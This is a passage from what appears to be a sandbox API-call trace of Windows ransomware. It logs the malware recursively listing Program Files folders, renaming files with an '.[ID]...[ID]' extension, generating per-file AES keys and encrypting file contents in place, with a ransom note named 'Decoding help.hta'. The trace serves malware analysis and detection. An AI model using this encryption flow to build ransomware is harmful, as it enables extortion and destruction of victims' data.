Files\\Microsoft Shared\\TRANSLAT\\*.*") returned 63 [0044.824] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\", lpString2="MSB1AR.LEX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" [0044.824] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" [0044.824] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.[ID]g9uZrLhJaygpwRm1[ID]" [0044.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f4 [0044.838] CreateFileMappingA (hFile=0x5f4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x320 [0044.838] CryptAcquireContextA (in: phProv=0x1901fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1901fcec*=0x34490b0) returned 1 [0044.839] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0x1901fce8 | out: phKey=0x1901fce8*=0x5da378) returned 1 [0044.839] CryptExportKey (in: hKey=0x5da378, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1901fbe4, pdwDataLen=0x1901fce4 | out: pbData=0x1901fbe4*, pdwDataLen=0x1901fce4*=0x2c) returned 1 [0044.839] MapViewOfFile (hFileMappingObject=0x320, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xf850000 [0044.870] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1901fbe4*, pdwDataLen=0x1901fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1901fbe4*, pdwDataLen=0x1901fcf8*=0x100) returned 1 [0044.870] CryptEncrypt (in: hKey=0x5da378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xf850000, pdwDataLen=0x1901fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xf850000*, pdwDataLen=0x1901fce4*=0x100000) returned 1 [0046.835] UnmapViewOfFile (lpBaseAddress=0xf850000) returned 1 [0046.846] CloseHandle (hObject=0x320) returned 1 [0046.846] CryptDestroyKey (hKey=0x5da378) returned 1 [0046.846] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0046.846] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.847] WriteFile (in: hFile=0x5f4, lpBuffer=0x1901fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1901fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1901fbe4*, lpNumberOfBytesWritten=0x1901fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.934] WriteFile (in: hFile=0x5f4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1901fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1901fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.934] CloseHandle (hObject=0x5f4) returned 1 [0050.396] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.655] FindNextFileW (in: hFindFile=0x5da778, lpFindFileData=0x1901fd30 | out: lpFindFileData=0x1901fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7780a100, ftCreationTime.dwHighDateTime=0x1c4d75f, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7780a100, ftLastWriteTime.dwHighDateTime=0x1c4d75f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSB1CACH.LEX", cAlternateFileName="")) returned 1 [0053.655] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0053.655] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned 63 [0053.655] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\Decoding help.hta" [0053.655] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\decoding help.hta")) returned 0x1 [0053.655] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSB1CACH.LEX") returned -1 [0053.655] lstrlenW (lpString="MSB1CACH.LEX") returned 12 [0053.655] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0053.655] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned 63 [0053.655] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\", lpString2="MSB1CACH.LEX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" [0053.655] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" [0053.655] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX.[ID]g9uZrLhJaygpwRm1[ID]" [0053.655] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.671] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0060.671] CreateFileMappingA (hFile=0x1e8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4d8 [0060.671] CryptAcquireContextA (in: phProv=0x1901fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1901fcec*=0x10e28bd0) returned 1 [0060.672] CryptGenKey (in: hProv=0x10e28bd0, Algid=0x6610, dwFlags=0x1, phKey=0x1901fce8 | out: phKey=0x1901fce8*=0x10a4b0e8) returned 1 [0060.672] CryptExportKey (in: hKey=0x10a4b0e8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1901fbe4, pdwDataLen=0x1901fce4 | out: pbData=0x1901fbe4*, pdwDataLen=0x1901fce4*=0x2c) returned 1 [0060.672] MapViewOfFile (hFileMappingObject=0x4d8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x600) returned 0x2d0000 [0065.020] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1901fbe4*, pdwDataLen=0x1901fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1901fbe4*, pdwDataLen=0x1901fcf8*=0x100) returned 1 [0065.021] CryptEncrypt (in: hKey=0x10a4b0e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x1901fce4*=0x600, dwBufLen=0x600 | out: pbData=0x2d0000*, pdwDataLen=0x1901fce4*=0x600) returned 1 [0065.021] UnmapViewOfFile (lpBaseAddress=0x2d0000) Thread: id = 392 os_tid = 0xa94 [0043.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*", lpFindFileData=0x1911fd30 | out: lpFindFileData=0x1911fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f4696f0, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da678 [0043.868] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.868] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1911fd30 | out: lpFindFileData=0x1911fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f4696f0, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.868] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.868] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.868] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1911fd30 | out: lpFindFileData=0x1911fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52622770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x617be070, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x617be070, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8.0", cAlternateFileName="")) returned 1 [0043.868] lstrcmpW (lpString1=".", lpString2="8.0") returned -1 [0043.868] lstrcmpW (lpString1="..", lpString2="8.0") returned -1 [0043.868] lstrcmpiW (lpString1="windows", lpString2="8.0") returned 1 [0044.302] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*" [0044.302] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*") returned 65 [0044.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\", lpString2="8.0" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0" [0044.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*" [0044.302] GlobalMemoryStatus (in: lpBuffer=0x1911fd10 | out: lpBuffer=0x1911fd10) [0044.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x111b3c88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x724 [0044.321] CloseHandle (hObject=0x724) returned 1 [0044.322] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1911fd30 | out: lpFindFileData=0x1911fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5707cc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5707cc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppInfoDocument", cAlternateFileName="APPINF~1")) returned 1 [0044.322] lstrcmpW (lpString1=".", lpString2="AppInfoDocument") returned -1 [0044.322] lstrcmpW (lpString1="..", lpString2="AppInfoDocument") returned -1 [0044.322] lstrcmpiW (lpString1="windows", lpString2="AppInfoDocument") returned 1 [0044.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*" [0044.323] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*") returned 65 [0044.323] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\", lpString2="AppInfoDocument" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument" [0044.323] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*.*" [0044.323] GlobalMemoryStatus (in: lpBuffer=0x1911fd10 | out: lpBuffer=0x1911fd10) [0044.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116c9a78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x724 [0044.344] CloseHandle (hObject=0x724) returned 1 [0044.344] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1911fd30 | out: lpFindFileData=0x1911fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20323f10, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x69acfbd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69acfbd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pipeline.v10.0", cAlternateFileName="PIPELI~1.0")) returned 1 [0044.344] lstrcmpW (lpString1=".", lpString2="Pipeline.v10.0") returned -1 [0044.344] lstrcmpW (lpString1="..", lpString2="Pipeline.v10.0") returned -1 [0044.344] lstrcmpiW (lpString1="windows", lpString2="Pipeline.v10.0") returned 1 [0044.347] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*" [0044.347] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*") returned 65 [0044.347] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\", lpString2="Pipeline.v10.0" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0" [0044.347] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" [0044.347] GlobalMemoryStatus (in: lpBuffer=0x1911fd10 | out: lpBuffer=0x1911fd10) [0044.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11711bb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x724 [0044.405] CloseHandle (hObject=0x724) returned 1 [0044.405] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1911fd30 | out: lpFindFileData=0x1911fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20323f10, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x69acfbd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69acfbd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pipeline.v10.0", cAlternateFileName="PIPELI~1.0")) returned 0 [0044.406] FindClose (in: hFindFile=0x5da678 | out: hFindFile=0x5da678) returned 1 Thread: id = 393 os_tid = 0xaf0 [0043.872] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*.*", lpFindFileData=0x1925fd30 | out: lpFindFileData=0x1925fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da738 [0044.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.338] FindNextFileW (in: hFindFile=0x5da738, lpFindFileData=0x1925fd30 | out: lpFindFileData=0x1925fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.338] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.338] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.338] FindNextFileW (in: hFindFile=0x5da738, lpFindFileData=0x1925fd30 | out: lpFindFileData=0x1925fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0044.338] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0044.338] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0044.338] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0044.341] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*.*" [0044.341] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*.*") returned 62 [0044.341] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US" [0044.341] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*.*" [0044.341] GlobalMemoryStatus (in: lpBuffer=0x1925fd10 | out: lpBuffer=0x1925fd10) [0044.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116f9b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x774 [0044.403] CloseHandle (hObject=0x774) returned 1 [0044.403] FindNextFileW (in: hFindFile=0x5da738, lpFindFileData=0x1925fd30 | out: lpFindFileData=0x1925fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0044.403] FindClose (in: hFindFile=0x5da738 | out: hFindFile=0x5da738) returned 1 Thread: id = 394 os_tid = 0xaf4 [0043.873] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\*.*", lpFindFileData=0x1939fd30 | out: lpFindFileData=0x1939fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da7b8 [0044.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.420] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x1939fd30 | out: lpFindFileData=0x1939fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.420] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.420] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.420] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x1939fd30 | out: lpFindFileData=0x1939fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTS20", cAlternateFileName="")) returned 1 [0044.420] lstrcmpW (lpString1=".", lpString2="TTS20") returned -1 [0044.420] lstrcmpW (lpString1="..", lpString2="TTS20") returned -1 [0044.420] lstrcmpiW (lpString1="windows", lpString2="TTS20") returned 1 [0044.420] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\*.*" [0044.420] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\*.*") returned 67 [0044.420] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\", lpString2="TTS20" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20" [0044.420] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common 